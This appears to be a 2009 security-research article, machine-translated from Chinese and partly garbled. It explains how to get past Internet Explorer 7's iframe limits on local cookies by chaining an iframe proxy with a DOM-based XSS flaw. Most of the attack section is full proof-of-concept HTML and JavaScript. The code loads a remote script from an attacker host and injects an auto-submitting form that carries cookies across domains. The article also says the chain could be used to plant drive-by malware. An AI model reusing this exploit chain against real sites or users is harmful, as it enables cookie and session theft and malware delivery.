Break IE security restrict access to the iframe sub-frame within the local cookie-vulnerability warning-the black bar safety net

2009-03-19T00:00:00
ID MYHACK58:62200922569
Type myhack58
Reporter 佚名
Modified 2009-03-19T00:00:00

Description

Author: aullik5 Today this article is mainly to say the following so a few things: 1. iframe limitations 2. Break the iframe to get the local cookie ideas 3. Use Cross Iframe Trick breakthrough iframe security restrictions My test environment is: IE 7 (7.0.5730.13) All of the following content all through the I in the IE7 test, is real and effective results.

Iframe restrictions: Because the iframe this thing is rather special, so the browser on it is generally have some limitations.

First, the parent window can not control the child window js, can only read some of the object; the sub-window cannot use the parent window's js, it can only read part of the object, the more for example, document What The are restricted.

The relationship is as follows: - iframe's should not be able to view content/cookies from another domain - iframe children CAN view certain properties and execute certain behaviors - parent. window. blur - parent. window. opener - parent. window. length - others

- iframe children CAN redirect the parent frame to a new location (great for phishing) - parent. location. href - parent. window. location

For some the use of a child window of the parent window js method is to limit the For example, in the sub-window so to use: parent. location. href="http://www.sohu.com";

The above statement will put the parent window is re-defined to the sohu web site to go to.

But if you want to execute the js, or is to read the document object, you will be denied access parent. location. href=new String("javascript:alert(document. cookie)"); parent. location. href=new String("javascript:alert(1)");

Like the two articles will be rejected.

For the iframe, Firefox3 is actually not limited to the local cookie is sent! That is, in the Firefox environment, using an iframe that contains a remote page that will be stored in the local cookie is sent out, which makes the CSRF will be very convenient.

But IE is different, for IE environment, the img and iframe tags only send the session cookie cannot be sent to the local cookie, so a lot of times CSRF will fail, which will also giveXSSbring a lot of trouble, such as will makes XSRF more difficult.

Given that Firefox is a little challenging are not, so today the main research object is IE.

In the IE environment, programmers generally use the P3P Protocol to obtain the cross-domain cookie, but P3P also requires us to rewrite the HTTP headers, and more trouble in here, I purely use some scripting skills to break through these restrictions.

Break the IFRAME limits of the ideas: the following are in the IE environment Since the page where the iframe is sending the session cookie, so the sub-frame page itself is only a session cookie, we can't By in the sub-frame in the implementation of the js method to get the local cookie, nothing the thing is dry does not come out.

Understanding of this principle, the idea is very clear: think of something new from an unrestricted window, so get the local cookie.

Specifically, there are so two ways: 1, The use of the window. open in a new window 2, Back to the parent window, let it open in a new window

In the sub-frame, using the window. open()can indeed send a local cookie, but the problem is that browsers generally will limit page Pop Port, it will be blocked, so this method is more embarrassed~~that is not a good approach.

And the second one way back to the parent window to open a new window, it comes to a break iframe script execution problem, and this problem in my previous article Cross Iframe Trick is already solved, so our method is ready to come out.

Use Cross Iframe Trick breakthrough iframe limiting access to the sub-frame cookie:

Cross the Iframe's greatest contribution is that he can bypass the previously mentioned iframe in the parent domain or sub-frame to get the object and execute the script.

When a page is difficult to break, and if he contains one of the weaknesses of the iframe page, it might have disastrous results.

I believe the true proficient in scripting attack people is able to see its usefulness and advantages.

The environment is as follows: (binding 1 2 7. 0. 0. 1 www.baidu.com) http://www.a.com/1.html are we going to the attack page, it contains one of the weaknesses of the iframe, the user will only go to browse this page

http://www.baidu.com/3.html is we have control of the page, he as an iframe is 1. html. Here is the iframe proxy

http://www.a.com/4.html is www. a. com on a presenceXSSvulnerabilities page, the General user will not go to visit it!

http://www.b.com/4.js this is the attacker's own server on a malicious script, it will beXSSattacks, remote load 4. html.

由于 用户 只 会 浏览 www.a.com/1.html so we want to through a script attack, 从www.a.com/1.html里获取用户在www.baidu.com/3.html的本地cookie the.

www.a.com/1.html 的 代码 如下 to: ---------------------------------- I was smart dividing line------------------------------------------- <script> // Function tt1 ,in the end will be 4. html injection parameters function tt1(fvck){ alert("tt1() and args= "+fvck); document. write("<input id=\"bbb\" value=\'test1"+fvck+"\' >"); } </script>

<body > <iframe id="tt2_3" src="http://www.baidu.com/3.html" width="3 0 0" height="3 0 0" ></iframe> </body> ---------------------------------- I was smart dividing line-------------------------------------------

It contains a iframe page

www.baidu.com/3.html the code is: ---------------------------------- I was smart dividing line------------------------------------------- <html> <body >

<script> //the parent. location. href=new String("javascript:alert(document. cookie)"); //the parent. location. href="http://www.sohu.com";

alert("3.html in the iframe and cookie="+document. cookie);

// iframe proxy: create a dynamic iframe, and use 4. htmlXSSvulnerability var tt1_4 = document. createElement("iframe"); tt1_4. src = "http://www.A.com/4.html#' ><script src=\"http://www.b.com/4.js\"><\/script><\'"; document. body. appendChild(tt1_4); </script>

</body> </html> ---------------------------------- I was smart dividing line-------------------------------------------

  1. html is our the iframe proxy, use it to complete the in www. a. com in the execution of the script work.

www.a.com/4.html the code is: ---------------------------------- I was smart dividing line------------------------------------------- <html>

<script> // A DOM-basedXSSvulnerability document. write("<input id=\"aaa\" value=\'when the test4"+window. location. href+"\' >"); //the window. open("http://www.baidu.com/4.html"); 'll bring cookies </script>

<body > This is 4.html! <!-- Put here a comment removed can be used to test, so that the transmission or session cookies! <form id="form1" method="post" action="http://www.baidu.com/2.html" > <img src="http://himg.baidu.com/sys/portrait/item/26ba61756c6c696b35c504.jpg" onload=submitpost4();> </form> <script>function submitpost4(){ document. forms[0]. submit(); }</script> --> </body> </html> ---------------------------------- I was smart dividing line-------------------------------------------

www.b.com/4.js the code is: ---------------------------------- I was smart dividing line------------------------------------------- alert("4. js is loaded!");

top. tt1('\'><form id=\"form1\" method=\"post\" action=\"http://www.baidu.com/2.html\" ><img src=\"http://himg.baidu.com/sys/portrait/item/26ba61756c6c696b35c504.jpg\" onload=submitpost4();></form><script>function submitpost4(){ document. forms[0]. submit(); }</script><\!-- \");

---------------------------------- I was smart dividing line-------------------------------------------

  1. js is our only real useXSSvulnerabilities and a Cross Iframe Trick to a new A window, so get the local cookie method.

www.baidu.com/2.html 的 代码 很 简单 his role is to view the current cookies: ---------------------------------- I was smart dividing line------------------------------------------- <script> alert("2.html cookie="+document. cookie); </script>

---------------------------------- I was smart dividing line-------------------------------------------

Here the attack process is this: www.a.com/1.html ----iframe----> www.baidu.com/3.html ----dynamic iframe---> www.a.com/4.html XSSvulnerability------> 在 www.a.com 域 中远 程 加载 www.b.com/4.js

  1. js dynamic invocation www.a.com/1.html in tt1() function, and tampering with parameters, write a form, use js to dynamically submit the form, then submit the form, you automatically bring a local cookie.

The entire process of running the results are as follows: The first visit www.a.com/1.html [img align=undefined]http://pic.yupoo.com/sunlei/6774961f9ce8/cd1xn34u.jpg[/img] 可以 看 到 这个 时候 在 www.baidu.com/3.html pop up is a session cookie, you can compare our final results in the pop-up local cookies next, 3. html constructs the iframe proxy

You can see that 由于 www.a.com/4.html 里 的XSSvulnerabilities are being exploited, so that the remote js is loaded.

Remote js continues to call top1. tt1(); this function, while tampering its parameters, parameters as on Figure display. Next will be to put this parameter is injected into tt1()function, since tt1()function in the presence of a document. write,so it will rewrite the page, and construct a form form, 重新提交到www.baidu.com/2.html

Due to the in the form form, the use of the img tag's onload event, making the img a load on the submission form, so soon automatically get the cookie.

You can see that in this case, 就是www.baidu.com/2.html the preservation of local cookie!

Note that in 4. html, even the top. tt1()into the document. write (), cannot access the local cookie, want to come should be, or because the iframe limits.

Above, is the use of Cross Iframe Trick tips to break the iframe limitation of the method, in the sense that cross-page attacks, cross-domain attack, breakthrough iframe restrictions, etc., greatly enriched the Scripting method.

Don't know I This is not also in white writing, if someone can take me to the POC a good tone again, will find it still very interesting.

Finally, re-tell, some people might ask questions, can be configured to iframe proxy, whether can be directly used to hang horse?

Yes, of course, can be directly used to hang horse, but hung it is more complex an attack, the requirements of a good browser vulnerabilities, a good Trojan horse, be able to fight the active Defense of the shellcode, at the same time, according to the need to obtain the data is different, sometimes hanging horse also can not achieve the purpose. For example, the target of the attack is the site where the data, if the site has SSL protection, anti-Keylogger type of program, it will be more trouble.